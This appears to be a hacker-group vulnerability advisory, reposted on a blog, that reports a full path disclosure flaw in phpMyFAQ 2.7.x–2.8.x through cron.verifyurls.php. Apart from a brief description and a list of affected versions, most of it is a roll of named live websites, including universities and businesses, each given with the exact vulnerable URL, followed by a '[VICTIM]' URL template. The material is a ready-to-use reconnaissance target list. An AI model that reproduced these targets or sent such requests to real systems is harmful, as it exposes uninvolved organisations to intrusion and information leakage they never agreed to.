~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Homepage : http://h4x0resec.blogspot.com
[~] Guzel Insanlar : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, ZoRLu ( milw00rm.com ),
EthicalHacker, BurakGrs, alpican
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : phpMyFAQ 2.x.x
|~Software: http://www.phpmyfaq.de/
|~Vulnerability Style : Full Path Disclosure
|[~]Date : "27.12.2014"
|[~]Tested on : Windows 7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Although in itself does not lead to a real risk of attack,
it allows you to go back to the internal structure of a server via a website
and then to have more information to be used in case of pentesting,
putting at risk not only the safety of the site but around the server that supplies.
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tested on Affected Versions
2.8.14, 2.8.12, 2.8.11, 2.8.9, 2.8.8, 2.8.4, 2.8.3
2.8.2 , 2.8.0 , 2.7.9, 2.7.7, 2.7.5
-----------------------------------------------------------
http://www.our-families.info/phpmyfaq/cron.verifyurls.php - 2.8.14
http://faq.phpmyfaq.de/cron.verifyurls.php - 2.8.12 <= ( Official )
https://www.joovuu.com/faq/cron.verifyurls.php - 2.8.12
https://cqpon.com/faq/cron.verifyurls.php - 2.8.11
http://info.umkc.edu/online/faq//cron.verifyurls.php - 2.8.9
http://hispapanels.com/faq/cron.verifyurls.php - 2.8.8
http://sss.bilecik.edu.tr/cron.verifyurls.php - 2.8.4
https://www.flightsimnorway.com/faq/cron.verifyurls.php - 2.8.3
http://www.nwas.com/faq/cron.verifyurls.php - 2.8.2
https://faq.ifc.cnr.it/cron.verifyurls.php - 2.8.0
http://www.cinet.com/faq/cron.verifyurls.php - 2.7.9
https://joker.com/faq/cron.verifyurls.php - 2.7.7 O.o
http://neu.edu.tr/faq/cron.verifyurls.php -2.7.5
==============[?]===============================
http://[VICTIM]/faq/cron.verifyurls.php
===========================================================
Hiç yorum yok:
Yorum Gönder